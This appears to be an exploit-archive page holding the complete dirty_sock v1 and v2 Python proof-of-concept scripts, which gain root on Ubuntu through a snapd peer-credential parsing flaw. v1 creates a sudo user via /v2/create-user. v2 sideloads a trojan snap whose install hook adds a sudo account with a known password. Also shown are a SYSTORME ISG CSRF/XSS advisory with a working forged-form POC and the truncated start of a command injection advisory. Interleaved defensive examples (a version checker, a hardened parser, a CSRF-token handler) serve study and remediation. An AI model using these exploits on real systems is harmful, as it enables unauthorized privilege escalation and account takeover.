Channel: Exploit Collector

runc Host Command Execution


snapd 2.37 (Ubuntu) dirty_sock Local Privilege Escalation


This exploit bypasses access control checks to use a restricted API function (POST /v2/create-user) of the local snapd service. This queries the Ubuntu SSO for a username and public SSH key of a provided email address, and then creates a local user based on these values. Successful exploitation for this version requires an outbound Internet connection and an SSH service accessible via localhost. This is the first of two proof-of-concept scripts related to this issue. Versions below 2.37.1 are affected.


MD5 | 0dcbfdab6f37dbe3458ba63c7f68ffc7

#!/usr/bin/env python3

"""
# dirty_sock: Privilege Escalation in Ubuntu (via snapd)
In January 2019, current versions of Ubuntu Linux were found to be vulnerable to local privilege escalation due to a bug in the snapd API. This repository contains the original exploit POC, which is being made available for research and education. For a detailed walkthrough of the vulnerability and the exploit, please refer to the <a href="https://initblog.com/2019/dirty-sock/" target="_blank"> blog posting here</a>.

You can easily check if your system is vulnerable. Run the command below. If your `snapd` is 2.37.1 or newer, you are safe.
```
$ snap version
...
snapd 2.37.1
...
```

# Usage
## Version One (use in most cases)
This exploit bypasses access control checks to use a restricted API function (POST /v2/create-user) of the local snapd service. This queries the Ubuntu SSO for a username and public SSH key of a provided email address, and then creates a local user based on these values.

Successful exploitation for this version requires an outbound Internet connection and an SSH service accessible via localhost.

To exploit, first create an account at the <a href="https://login.ubuntu.com/" target="_blank">Ubuntu SSO</a>. After confirming it, edit your profile and upload an SSH public key. Then, run the exploit like this (with the SSH private key corresponding to the public key you uploaded):

```
python3 ./dirty_sockv1.py -u "you@yourmail.com" -k "id_rsa"

[+] Slipped dirty sock on random socket file: /tmp/ktgolhtvdk;uid=0;
[+] Binding to socket file...
[+] Connecting to snapd API...
[+] Sending payload...
[+] Success! Enjoy your new account with sudo rights!

[Script will automatically ssh to localhost with the SSH key here]
```

## Version Two (use in special cases)
This exploit bypasses access control checks to use a restricted API function (POST /v2/snaps) of the local snapd service. This allows the installation of arbitrary snaps. Snaps in "devmode" bypass the sandbox and may include an "install hook" that is run in the context of root at install time.

dirty_sockv2 leverages the vulnerability to install an empty "devmode" snap including a hook that adds a new user to the local system. This user will have permissions to execute sudo commands.

As opposed to version one, this does not require the SSH service to be running. It will also work on newer versions of Ubuntu with no Internet connection at all, making it resilient to changes and effective in restricted environments.

This exploit should also be effective on non-Ubuntu systems that have installed snapd but that do not support the "create-user" API due to incompatible Linux shell syntax.

Some older Ubuntu systems (like 16.04) may not have the snapd components installed that are required for sideloading. If this is the case, this version of the exploit may trigger it to install those dependencies. During that installation, snapd may upgrade itself to a non-vulnerable version. Testing shows that the exploit is still successful in this scenario. See the troubleshooting section for more details.

To exploit, simply run the script with no arguments on a vulnerable system.

```
python3 ./dirty_sockv2.py

[+] Slipped dirty sock on random socket file: /tmp/gytwczalgx;uid=0;
[+] Binding to socket file...
[+] Connecting to snapd API...
[+] Deleting trojan snap (and sleeping 5 seconds)...
[+] Installing the trojan snap (and sleeping 8 seconds)...
[+] Deleting trojan snap (and sleeping 5 seconds)...

********************
Success! You can now `su` to the following account and use sudo:
username: dirty_sock
password: dirty_sock
********************

```


# Troubleshooting
If using version two, and the exploit completes but you don't see your new account, this may be due to some background snap updates. You can view these by executing `snap changes` and then `snap change #`, referencing the line showing the install of the dirty_sock snap. Eventually, these should complete and your account should be usable.

Version 1 seems to be the easiest and fastest, if your environment supports it (SSH service running and accessible from localhost).

Please open issues for anything weird.

# Disclosure Info
The issue was reported directly to the snapd team via Ubuntu's bug tracker. You can read the full thread <a href="https://bugs.launchpad.net/snapd/+bug/1813365" target="_blank">here</a>.

I was very impressed with Canonical's response to this issue. The team was awesome to work with, and overall the experience makes me feel very good about being an Ubuntu user myself.

Public advisory links:
- https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/SnapSocketParsing
- https://usn.ubuntu.com/3887-1/


Proof of Concept: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46361.zip
"""

"""
Local privilege escalation via snapd, affecting Ubuntu and others.

v1 of dirty_sock leverages the /v2/create-user API to create a new local user
based on information in an Ubuntu SSO profile. It requires outbound Internet
access as well as the SSH service running and available from localhost.

Try v2 in more restricted environments, but use v1 when possible.

Before running v1, you need to:
- Create an Ubuntu SSO account (https://login.ubuntu.com/)
- Login to that account and ensure you have your public SSH key configured
in your profile.

Run exploit like this:
dirty_sock.py -u <account email> -k <ssh priv key file>

A new local user with sudo rights will be created using the username from your
Ubuntu SSO profile. The SSH public key will be copied into this user's profile.

The exploit will automatically SSH into localhost when finished.

Research and POC by initstring (https://github.com/initstring/dirty_sock)
"""

import argparse
import string
import random
import socket
import re
import sys
import os

BANNER = r'''
___ _ ____ ___ _ _ ____ ____ ____ _ _
| \ | |__/ | \_/ [__ | | | |_/
|__/ | | \ | | ___ ___] |__| |___ | \_
(version 1)

//=========[]==========================================\\
|| R&D || initstring (@init_string) ||
|| Source || https://github.com/initstring/dirty_sock ||
|| Details || https://initblog.com/2019/dirty-sock ||
\\=========[]==========================================//

'''


def process_args():
    """Handles user-passed parameters"""
    parser = argparse.ArgumentParser()
    parser.add_argument('--username', '-u', type=str, action='store',
                        required=True, help='Your Ubuntu One account email.')
    parser.add_argument('--key', '-k', type=str, action='store',
                        required=True, help='Full path to the ssh privkey'
                        ' matching the pubkey in your Ubuntu One account.')

    args = parser.parse_args()

    if not os.path.isfile(args.key):
        print("[!] That key file does not exist. Please try again.")
        sys.exit()

    return args

def create_sockfile():
    """Generates a random socket file name to use"""
    alphabet = string.ascii_lowercase
    random_string = ''.join(random.choice(alphabet) for i in range(10))
    dirty_sock = ';uid=0;'

    # This is where we slip on the dirty sock. This makes its way into the
    # UNIX AF_SOCKET's peer data, which is parsed in an insecure fashion
    # by snapd's ucrednet.go file, allowing us to overwrite the UID variable.
    sockfile = '/tmp/' + random_string + dirty_sock

    print("[+] Slipped dirty sock on random socket file: " + sockfile)

    return sockfile

def bind_sock(sockfile):
    """Binds to a local file"""
    # This exploit only works if we also BIND to the socket after creating
    # it, as we need to inject the dirty sock as a remote peer in the
    # socket's ancillary data.
    print("[+] Binding to socket file...")
    client_sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    client_sock.bind(sockfile)

    # Connect to the snap daemon
    print("[+] Connecting to snapd API...")
    client_sock.connect('/run/snapd.socket')

    return client_sock

def add_user(args, client_sock):
    """Main exploit function"""
    post_payload = ('{"email": "' + args.username +
                    '", "sudoer": true, "force-managed": true}')
    http_req = ('POST /v2/create-user HTTP/1.1\r\n'
                'Host: localhost\r\n'
                'Content-Length: ' + str(len(post_payload)) + '\r\n\r\n'
                + post_payload)

    # Send our payload to the snap API
    print("[+] Sending payload...")
    client_sock.sendall(http_req.encode("utf-8"))

    # Receive the data and extract the JSON
    http_reply = client_sock.recv(8192).decode("utf-8")

    # Try to extract a username from the valid reply
    regex = re.compile(r'"status":"OK","result":{"username":"(.*?)"')
    username = re.findall(regex, http_reply)

    # If exploit was not successful, give details and exit
    if '"status":"Unauthorized"' in http_reply:
        print("[!] System may not be vulnerable, here is the API reply:\n\n")
        print(http_reply)
        sys.exit()

    if 'cannot find user' in http_reply:
        print("[!] Could not find user in the snap store... did you follow"
              " the instructions?")
        print("Here is the API reply:")
        print(http_reply)
        sys.exit()

    if not username:
        print("[!] Something went wrong... Here is the API reply:")
        print(http_reply)
        sys.exit()

    # SSH into localhost with our new root account
    print("[+] Success! Enjoy your new account with sudo rights!")
    cmd1 = 'chmod 600 ' + args.key
    cmd2 = 'ssh ' + username[0] + '@localhost -i ' + args.key
    os.system(cmd1)
    os.system(cmd2)

    print("[+] Hope you enjoyed your stay!")
    sys.exit()



def main():
    """Main program function"""

    # Gotta have a banner...
    print(BANNER)

    # Process the required arguments
    args = process_args()

    # Create a random name for the dirty socket file
    sockfile = create_sockfile()

    # Bind the dirty socket to the snapdapi
    client_sock = bind_sock(sockfile)

    # Exploit away...
    add_user(args, client_sock)

    # Remove the dirty socket file
    os.remove(sockfile)


if __name__ == '__main__':
    main()
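The README above tells administrators to run `snap version` and compare the snapd line against 2.37.1 by eye. The following script automates that check for fleet use: it parses the command's output, reduces the version string to comparable numeric components (suffixes such as `+18.04` or `~pre1` are ignored) and reports whether the host is below the fixed release. This is an added example and not part of the dirty_sock POC; the sample outputs are constructed in the layout `snap version` prints, and the "2.37.1 or newer is safe" rule is the README's own.

```python
"""
Checks whether a host's snapd is below the fixed 2.37.1 release, either from
captured `snap version` output or by running the command locally.
Added example, not part of the dirty_sock POC.
"""
import re
import subprocess
from typing import Optional, Tuple

FIXED_VERSION = (2, 37, 1)   # first unaffected release, per the README


def parse_version(text: str) -> Tuple[int, ...]:
    """Reduce '2.37.1', '2.37', '2.37.1+18.04' or '2.36.3~pre1' to the
    leading numeric components so that tuples compare correctly."""
    m = re.match(r"\s*(\d+(?:\.\d+)*)", text)
    if m is None:
        raise ValueError("unrecognised version string: %r" % text)
    return tuple(int(part) for part in m.group(1).split("."))


def snapd_version_from_output(output: str) -> Optional[str]:
    """Pick the 'snapd <version>' row out of `snap version` output.
    Returns None when there is no such row (snapd not installed)."""
    for line in output.splitlines():
        fields = line.split()
        if len(fields) >= 2 and fields[0] == "snapd":
            return fields[1]
    return None


def is_vulnerable(output: str) -> Optional[bool]:
    """True when snapd is older than 2.37.1, False when patched, None when
    the output carries no parseable snapd row (e.g. 'snapd unavailable')."""
    version = snapd_version_from_output(output)
    if version is None:
        return None
    try:
        return parse_version(version) < FIXED_VERSION
    except ValueError:
        return None


def check_local_host() -> Optional[bool]:
    """Run `snap version` on this machine; None if the snap CLI is absent."""
    try:
        proc = subprocess.run(["snap", "version"], capture_output=True,
                              text=True, check=False)
    except FileNotFoundError:
        return None
    return is_vulnerable(proc.stdout)


# Constructed sample outputs in the layout `snap version` prints.
SAMPLE_VULNERABLE = ("snap    2.37\nsnapd   2.37\nseries  16\n"
                     "ubuntu  18.10\nkernel  4.18.0-13-generic\n")
SAMPLE_PATCHED = ("snap    2.37.1\nsnapd   2.37.1\nseries  16\n"
                  "ubuntu  18.04\nkernel  4.15.0-45-generic\n")
SAMPLE_NO_SNAPD = "snap    2.37\nseries  16\n"

if __name__ == "__main__":
    state = check_local_host()
    print({True: "snapd older than 2.37.1: affected",
           False: "snapd 2.37.1 or newer: not affected",
           None: "snapd not found or version not parseable"}[state])
```

Tuple comparison is what makes the bare `2.37` reported by affected hosts sort below `(2, 37, 1)`; a plain string comparison would get `2.37.10` versus `2.37.9` wrong, which is why the components are converted to integers first.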

snapd 2.37 (Ubuntu) dirty_sock Local Privilege Escalation


This exploit bypasses access control checks to use a restricted API function (POST /v2/snaps) of the local snapd service. This allows the installation of arbitrary snaps. Snaps in "devmode" bypass the sandbox and may include an "install hook" that is run in the context of root at install time. dirty_sockv2 leverages the vulnerability to install an empty "devmode" snap including a hook that adds a new user to the local system. This user will have permissions to execute sudo commands. As opposed to version one, this does not require the SSH service to be running. It will also work on newer versions of Ubuntu with no Internet connection at all, making it resilient to changes and effective in restricted environments. This exploit should also be effective on non-Ubuntu systems that have installed snapd but that do not support the "create-user" API due to incompatible Linux shell syntax. Some older Ubuntu systems (like 16.04) may not have the snapd components installed that are required for sideloading. If this is the case, this version of the exploit may trigger it to install those dependencies. During that installation, snapd may upgrade itself to a non-vulnerable version. Testing shows that the exploit is still successful in this scenario. This is the second of two proof-of-concept scripts related to this issue. Versions below 2.37.1 are affected.


MD5 | e9db49ddfa940a474a61af831e403fe3

#!/usr/bin/env python3

"""
# dirty_sock: Privilege Escalation in Ubuntu (via snapd)
In January 2019, current versions of Ubuntu Linux were found to be vulnerable to local privilege escalation due to a bug in the snapd API. This repository contains the original exploit POC, which is being made available for research and education. For a detailed walkthrough of the vulnerability and the exploit, please refer to the <a href="https://initblog.com/2019/dirty-sock/" target="_blank"> blog posting here</a>.

You can easily check if your system is vulnerable. Run the command below. If your `snapd` is 2.37.1 or newer, you are safe.
```
$ snap version
...
snapd 2.37.1
...
```

# Usage
## Version One (use in most cases)
This exploit bypasses access control checks to use a restricted API function (POST /v2/create-user) of the local snapd service. This queries the Ubuntu SSO for a username and public SSH key of a provided email address, and then creates a local user based on these values.

Successful exploitation for this version requires an outbound Internet connection and an SSH service accessible via localhost.

To exploit, first create an account at the <a href="https://login.ubuntu.com/" target="_blank">Ubuntu SSO</a>. After confirming it, edit your profile and upload an SSH public key. Then, run the exploit like this (with the SSH private key corresponding to the public key you uploaded):

```
python3 ./dirty_sockv1.py -u "you@yourmail.com" -k "id_rsa"

[+] Slipped dirty sock on random socket file: /tmp/ktgolhtvdk;uid=0;
[+] Binding to socket file...
[+] Connecting to snapd API...
[+] Sending payload...
[+] Success! Enjoy your new account with sudo rights!

[Script will automatically ssh to localhost with the SSH key here]
```

## Version Two (use in special cases)
This exploit bypasses access control checks to use a restricted API function (POST /v2/snaps) of the local snapd service. This allows the installation of arbitrary snaps. Snaps in "devmode" bypass the sandbox and may include an "install hook" that is run in the context of root at install time.

dirty_sockv2 leverages the vulnerability to install an empty "devmode" snap including a hook that adds a new user to the local system. This user will have permissions to execute sudo commands.

As opposed to version one, this does not require the SSH service to be running. It will also work on newer versions of Ubuntu with no Internet connection at all, making it resilient to changes and effective in restricted environments.

This exploit should also be effective on non-Ubuntu systems that have installed snapd but that do not support the "create-user" API due to incompatible Linux shell syntax.

Some older Ubuntu systems (like 16.04) may not have the snapd components installed that are required for sideloading. If this is the case, this version of the exploit may trigger it to install those dependencies. During that installation, snapd may upgrade itself to a non-vulnerable version. Testing shows that the exploit is still successful in this scenario. See the troubleshooting section for more details.

To exploit, simply run the script with no arguments on a vulnerable system.

```
python3 ./dirty_sockv2.py

[+] Slipped dirty sock on random socket file: /tmp/gytwczalgx;uid=0;
[+] Binding to socket file...
[+] Connecting to snapd API...
[+] Deleting trojan snap (and sleeping 5 seconds)...
[+] Installing the trojan snap (and sleeping 8 seconds)...
[+] Deleting trojan snap (and sleeping 5 seconds)...

********************
Success! You can now `su` to the following account and use sudo:
username: dirty_sock
password: dirty_sock
********************

```


# Troubleshooting
If using version two, and the exploit completes but you don't see your new account, this may be due to some background snap updates. You can view these by executing `snap changes` and then `snap change #`, referencing the line showing the install of the dirty_sock snap. Eventually, these should complete and your account should be usable.

Version 1 seems to be the easiest and fastest, if your environment supports it (SSH service running and accessible from localhost).

Please open issues for anything weird.

# Disclosure Info
The issue was reported directly to the snapd team via Ubuntu's bug tracker. You can read the full thread <a href="https://bugs.launchpad.net/snapd/+bug/1813365" target="_blank">here</a>.

I was very impressed with Canonical's response to this issue. The team was awesome to work with, and overall the experience makes me feel very good about being an Ubuntu user myself.

Public advisory links:
- https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/SnapSocketParsing
- https://usn.ubuntu.com/3887-1/


Proof of Concept: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46361.zip
"""

"""
Local privilege escalation via snapd, affecting Ubuntu and others.

v2 of dirty_sock leverages the /v2/snaps API to sideload an empty snap
with an install hook that creates a new user.

v1 is recommended in most situations as it is less intrusive.

Simply run as is, no arguments, no requirements. If the exploit is successful,
the system will have a new user with sudo permissions as follows:
username: dirty_sock
password: dirty_sock

You can execute su dirty_sock when the exploit is complete. See the github page
for troubleshooting.

Research and POC by initstring (https://github.com/initstring/dirty_sock)
"""

import string
import random
import socket
import base64
import time
import sys
import os

BANNER = r'''
___ _ ____ ___ _ _ ____ ____ ____ _ _
| \ | |__/ | \_/ [__ | | | |_/
|__/ | | \ | | ___ ___] |__| |___ | \_
(version 2)

//=========[]==========================================\\
|| R&D || initstring (@init_string) ||
|| Source || https://github.com/initstring/dirty_sock ||
|| Details || https://initblog.com/2019/dirty-sock ||
\\=========[]==========================================//

'''


# The following global is a base64 encoded string representing an installable
# snap package. The snap itself is empty and has no functionality. It does,
# however, have a bash-script in the install hook that will create a new user.
# For full details, read the blog linked on the github page above.
TROJAN_SNAP = ('''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'''
+ 'A' * 4256 + '==')

def check_args():
    """Return short help if any args given"""
    if len(sys.argv) > 1:
        print("\n\n"
              "No arguments needed for this version. Simply run and enjoy."
              "\n\n")
        sys.exit()

def create_sockfile():
    """Generates a random socket file name to use"""
    alphabet = string.ascii_lowercase
    random_string = ''.join(random.choice(alphabet) for i in range(10))
    dirty_sock = ';uid=0;'

    # This is where we slip on the dirty sock. This makes its way into the
    # UNIX AF_SOCKET's peer data, which is parsed in an insecure fashion
    # by snapd's ucrednet.go file, allowing us to overwrite the UID variable.
    sockfile = '/tmp/' + random_string + dirty_sock

    print("[+] Slipped dirty sock on random socket file: " + sockfile)

    return sockfile

def bind_sock(sockfile):
    """Binds to a local file"""
    # This exploit only works if we also BIND to the socket after creating
    # it, as we need to inject the dirty sock as a remote peer in the
    # socket's ancillary data.
    print("[+] Binding to socket file...")
    client_sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    client_sock.bind(sockfile)

    # Connect to the snap daemon
    print("[+] Connecting to snapd API...")
    client_sock.connect('/run/snapd.socket')

    return client_sock

def delete_snap(client_sock):
    """Deletes the trojan snap, if installed"""
    post_payload = ('{"action": "remove",'
                    '"snaps": ["dirty-sock"]}')
    http_req = ('POST /v2/snaps HTTP/1.1\r\n'
                'Host: localhost\r\n'
                'Content-Type: application/json\r\n'
                'Content-Length: ' + str(len(post_payload)) + '\r\n\r\n'
                + post_payload)

    # Send our payload to the snap API
    print("[+] Deleting trojan snap (and sleeping 5 seconds)...")
    client_sock.sendall(http_req.encode("utf-8"))

    # Receive the data and extract the JSON
    http_reply = client_sock.recv(8192).decode("utf-8")

    # Exit on probably-not-vulnerable
    if '"status":"Unauthorized"' in http_reply:
        print("[!] System may not be vulnerable, here is the API reply:\n\n")
        print(http_reply)
        sys.exit()

    # Exit on failure
    if 'status-code":202' not in http_reply:
        print("[!] Did not work, here is the API reply:\n\n")
        print(http_reply)
        sys.exit()

    # We sleep to allow the API command to complete, otherwise the install
    # may fail.
    time.sleep(5)

def install_snap(client_sock):
    """Sideloads the trojan snap"""

    # Decode the base64 from above back into bytes
    blob = base64.b64decode(TROJAN_SNAP)

    # Configure the multi-part form upload boundary here:
    boundary = '------------------------f8c156143a1caf97'

    # Construct the POST payload for the /v2/snap API, per the instructions
    # here: https://github.com/snapcore/snapd/wiki/REST-API
    # This follows the 'sideloading' process.
    post_payload = '''
--------------------------f8c156143a1caf97
Content-Disposition: form-data; name="devmode"

true
--------------------------f8c156143a1caf97
Content-Disposition: form-data; name="snap"; filename="snap.snap"
Content-Type: application/octet-stream

''' + blob.decode('latin-1') + '''
--------------------------f8c156143a1caf97--'''


    # Multi-part form uploads are weird. First, we post the headers
    # and wait for an HTTP 100 reply. THEN we can send the payload.
    http_req1 = ('POST /v2/snaps HTTP/1.1\r\n'
                 'Host: localhost\r\n'
                 'Content-Type: multipart/form-data; boundary='
                 + boundary + '\r\n'
                 'Expect: 100-continue\r\n'
                 'Content-Length: ' + str(len(post_payload)) + '\r\n\r\n')

    # Send the headers to the snap API
    print("[+] Installing the trojan snap (and sleeping 8 seconds)...")
    client_sock.sendall(http_req1.encode("utf-8"))

    # Receive the initial HTTP/1.1 100 Continue reply
    http_reply = client_sock.recv(8192).decode("utf-8")

    if 'HTTP/1.1 100 Continue' not in http_reply:
        print("[!] Error starting POST conversation, here is the reply:\n\n")
        print(http_reply)
        sys.exit()

    # Now we can send the payload
    http_req2 = post_payload
    client_sock.sendall(http_req2.encode("latin-1"))

    # Receive the data and extract the JSON
    http_reply = client_sock.recv(8192).decode("utf-8")

    # Exit on failure
    if 'status-code":202' not in http_reply:
        print("[!] Did not work, here is the API reply:\n\n")
        print(http_reply)
        sys.exit()

    # Sleep to allow time for the snap to install correctly. Otherwise,
    # The uninstall that follows will fail, leaving unnecessary traces
    # on the machine.
    time.sleep(8)

def print_success():
    """Prints a success message if we've made it this far"""
    print("\n\n")
    print("********************")
    print("Success! You can now `su` to the following account and use sudo:")
    print(" username: dirty_sock")
    print(" password: dirty_sock")
    print("********************")
    print("\n\n")


def main():
    """Main program function"""

    # Gotta have a banner...
    print(BANNER)

    # Check for any args (none needed)
    check_args()

    # Create a random name for the dirty socket file
    sockfile = create_sockfile()

    # Bind the dirty socket to the snapdapi
    client_sock = bind_sock(sockfile)

    # Delete trojan snap, in case there was a previous install attempt
    delete_snap(client_sock)

    # Install the trojan snap, which has an install hook that creates a user
    install_snap(client_sock)

    # Delete the trojan snap
    delete_snap(client_sock)

    # Remove the dirty socket file
    os.remove(sockfile)

    # Congratulate the lucky hacker
    print_success()


if __name__ == '__main__':
    main()
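The comment in `create_sockfile()` above states the root cause in one line: the peer's socket path ends up in the same `;`-separated string as the kernel-supplied pid and uid, and snapd's parser honoured a `uid=` token wherever it appeared. The model below makes that visible and shows why a positional parse closes the hole: the real uid is read once from the fixed prefix and everything after `socket=` is treated as opaque data. This is an added example for readers of the advisory; the string format, both parsers and the `allow_privileged_call` gate are a simplified model of the description and are not snapd's `ucrednet.go` or its actual fix.

```python
"""
Models the peer-credential parsing flaw described in the create_sockfile()
comment, beside a positional parse that is not fooled by ';uid=0;' in a
socket path. Added example; not snapd's code and not the dirty_sock POC.
"""
import re
from typing import NamedTuple

NOBODY_UID = 65534   # assumed fallback when no credentials are available


class PeerCreds(NamedTuple):
    pid: int
    uid: int
    socket: str


def format_remote_addr(pid: int, uid: int, socket: str) -> str:
    """Kernel-supplied pid/uid plus the peer's socket path, joined into one
    ';'-separated string. Modelled format: the path is chosen by the client,
    because the client decides what name to bind its socket to."""
    return "pid=%d;uid=%d;socket=%s;" % (pid, uid, socket)


def parse_naive(remote_addr: str) -> PeerCreds:
    """Flawed parse: every ';'-separated token is inspected, so a 'uid=' token
    that came from the socket path overrides the real one (last wins)."""
    pid, uid, socket = 0, NOBODY_UID, ""
    for token in remote_addr.split(";"):
        if token.startswith("pid="):
            pid = int(token[4:])
        elif token.startswith("uid="):
            uid = int(token[4:])
        elif token.startswith("socket="):
            socket = token[7:]
    return PeerCreds(pid, uid, socket)


def parse_hardened(remote_addr: str) -> PeerCreds:
    """Positional parse: pid and uid are read once from the fixed prefix and
    everything between 'socket=' and the final ';' is opaque path data."""
    m = re.match(r"^pid=(\d+);uid=(\d+);socket=(.*);$", remote_addr, re.S)
    if m is None:
        raise ValueError("malformed peer address: %r" % remote_addr)
    return PeerCreds(int(m.group(1)), int(m.group(2)), m.group(3))


def allow_privileged_call(creds: PeerCreds) -> bool:
    """The access-control decision the bypass targets: root-only endpoints
    such as /v2/create-user are gated on the caller's uid being 0."""
    return creds.uid == 0


if __name__ == "__main__":
    # Constructed: an unprivileged caller (uid 1000) bound to a dirty name.
    addr = format_remote_addr(4242, 1000, "/tmp/ktgolhtvdk;uid=0;")
    for label, parser in (("naive", parse_naive), ("hardened", parse_hardened)):
        creds = parser(addr)
        print("%-8s -> %s  privileged=%s" % (label, creds,
                                              allow_privileged_call(creds)))
```

The lesson generalises beyond snapd: whenever trusted metadata and caller-controlled data share one delimited string, the parser must read the trusted fields from fixed positions before it ever looks at the untrusted tail, or keep them in separate fields altogether.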

SYSTORME ISG Cross Site Request Forgery


SYSTORME ISG products ISG-600C, ISG-600H, and ISG-800W suffer from a cross site request forgery vulnerability.


MD5 | d5e0c75c7f7c7d6ee5d9b1c51cadf251

=====================================================
Authenticated XSRF leads to complete Account Takeover
=====================================================

.. contents:: Table Of Content

Overview
========

Title: Authenticated XSRF leads to complete account takeover in all SYSTORME ISG products.
CVE ID: CVE-2018-19525
Author: Kaustubh G. Padwad
Vendor: Systrome Networks (http://systrome.com/about/)
Products:
1. ISG-600C
2. ISG-600H
3. ISG-800W


Tested Version: ISG-V1.1-R2.1_TRUNK-20180914.bin (the corresponding build for the other products)
Severity: High--Critical

Advisory ID
============
KSA-Dev-002


About the Product:
==================

Cumilon ISG-* cloud gateway is the security product developed by Systrome for the distributed access network for the cloud-computing era. It integrates the L2-L7 security features of the next-generation firewall, is based on the user identification and application identification and provides the application-layer firewall, intrusion prevention, anti-virus, anti-APT, VPN, intelligent bandwidth management, multi-egress link load balancing, content filtering, URL filtering, and other security functions. It provides the cloud interface. The security cloud management platform based on the big data platform architecture can monitor the network topology and device status in real time, simplifying the online deployment of the professional device via the auto configuration delivery. The real-time monitoring of the mobile terminal reduces the maintenance cost and makes the security visible at any time and anywhere. Systrome cloud gateway is the best access security choice of the middle and small enterprises, branch interconnection, and chain enterprises.

Description:
============
An issue was discovered on Systrome ISG-600C, ISG-600H, and ISG-800W 1.1-R2.1_TRUNK-20180914.bin devices. There is CSRF via /ui/?g=obj_keywords_add and /ui/?g=obj_keywords_addsave
with resultant XSS because of a lack of CSRF token validation.

Additional Information
======================
The web interface of the ISG firewalls does not validate the CSRF token, and the ?g=obj_keywords_add page does not properly sanitize
user input, which leads to XSS. By combining these two weaknesses, a forged request can be built that leads to complete account takeover via XSRF.

[Vulnerability Type]
====================
Cross Site Request Forgery (CSRF)

How to Reproduce: (POC):
========================
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://192.168.1.200/ui/?g=obj_keywords_add" method="POST">
<input type="hidden" name="name" value="xsrf" />
<input type="hidden" name="description" value="<svg><script>//" />
<input type="hidden" name="NewLine;confirm(1338);</script </svg>" value="" />
<input type="hidden" name="keyword" value="xsrf" />
<input type="hidden" name="submit_post" value="obj_keywords_addsave" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>



[Affected Component]
obj_keywords_add ,obj_keywords_addsave, CSRF Vulnerabilities,

------------------------------------------

[Attack Type]
Remote

------------------------------------------

[Impact Code execution]
true

------------------------------------------

[Attack Vectors]
Once the victim opens the crafted URL, the device is compromised.

Mitigation
==========

The vendor is working on a fix and expects to submit a solution around the first week of December.

Disclosure:
===========
02-Nov-2018 Discovered the vulnerability
15-Nov-2018 Reported to vendor
25-Nov-2018 Requested CVE ID(s)
26-Nov-2018 CVE assigned


[Vendor of Product]
Systrome Networks (http://systrome.com/about/)

credits:
========
* Kaustubh Padwad
* Information Security Researcher
* kingkaustubh@me.com
* https://s3curityb3ast.github.io/
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad
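The advisory attributes the takeover to two missing controls: the `obj_keywords_addsave` handler accepts a POST without a CSRF token, and the stored description is echoed back without HTML encoding, so the forged form's `<svg><script>` payload runs in the victim's session. The handler below models both fixes in Python, which is an added example and not the vendor's PHP code: the form field names (`name`, `description`, `keyword`, `submit_post`) are those of the POC form above, while the session/keyword stores, the `csrf_token` field and the function names are invented for the illustration.

```python
"""
Hardened model of the obj_keywords_addsave POST: a per-session CSRF token
compared in constant time, plus HTML encoding of stored values at output.
Added example, not the vendor's code; stores and names are constructed.
"""
import hmac
import html
import secrets
from typing import Dict, Optional

# Constructed in-memory stand-ins for the session store and keyword table.
SESSION_TOKENS: Dict[str, str] = {}
KEYWORDS: Dict[str, Dict[str, str]] = {}


def issue_csrf_token(session_id: str) -> str:
    """Mint a random token bound to the session; the server embeds it as a
    hidden field when it renders the obj_keywords_add form."""
    token = secrets.token_hex(32)
    SESSION_TOKENS[session_id] = token
    return token


def csrf_token_valid(session_id: str, submitted: Optional[str]) -> bool:
    """Constant-time compare; a missing or foreign token fails closed. A page
    on another origin cannot read the victim's token, so it cannot pass."""
    expected = SESSION_TOKENS.get(session_id)
    if expected is None or submitted is None:
        return False
    return hmac.compare_digest(expected, submitted)


def handle_keywords_addsave(session_id: str, form: Dict[str, str]) -> int:
    """Hardened handler for the POST; returns an HTTP-style status code."""
    if not csrf_token_valid(session_id, form.get("csrf_token")):
        return 403
    name = form.get("name", "").strip()
    if not name:
        return 400
    # Store the raw value; encoding is applied at output time, per context.
    KEYWORDS[name] = {"keyword": form.get("keyword", ""),
                      "description": form.get("description", "")}
    return 200


def render_keyword_row(name: str) -> str:
    """HTML-encode every stored value before placing it in the page, so
    '<svg><script>' is displayed as text instead of being executed."""
    entry = KEYWORDS[name]
    return "<tr><td>%s</td><td>%s</td><td>%s</td></tr>" % (
        html.escape(name, quote=True),
        html.escape(entry["keyword"], quote=True),
        html.escape(entry["description"], quote=True))


if __name__ == "__main__":
    # Constructed: the POC form's fields, first without and then with a token.
    forged = {"name": "xsrf", "description": "<svg><script>//",
              "keyword": "xsrf", "submit_post": "obj_keywords_addsave"}
    print("forged POST  ->", handle_keywords_addsave("victim", forged))
    token = issue_csrf_token("victim")
    print("genuine POST ->",
          handle_keywords_addsave("victim", dict(forged, csrf_token=token)))
    print(render_keyword_row("xsrf"))
```

Either control on its own would have stopped the chain in the advisory: the token check rejects the cross-site POST, and output encoding defuses the stored payload even if a request does get through.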




SYSTORME ISG Command Injection


SYSTORME ISG products ISG-600C, ISG-600H, and ISG-800W suffer from an authenticated command injection vulnerability.


MD5 | 2b900c12b8546c4e8e5c9f117e930eb6

=====================================
Authenticated Shell Command Injection
=====================================

.. contents:: Table Of Content

Overview
========

Title: Authenticated Shell Command Injection
Author: Kaustubh G. Padwad
CVE ID: CVE-2019-7383
Vendor: Systrome Networks (http://systrome.com/about/)
Products:
1. ISG-600C
2. ISG-600H
3. ISG-800W


Tested Version: ISG-V1.1-R2.1_TRUNK-20181105.bin (the corresponding build for the other products)
Severity: High--Critical

Advisory ID
============
KSA-Dev-003


About the Product:
==================

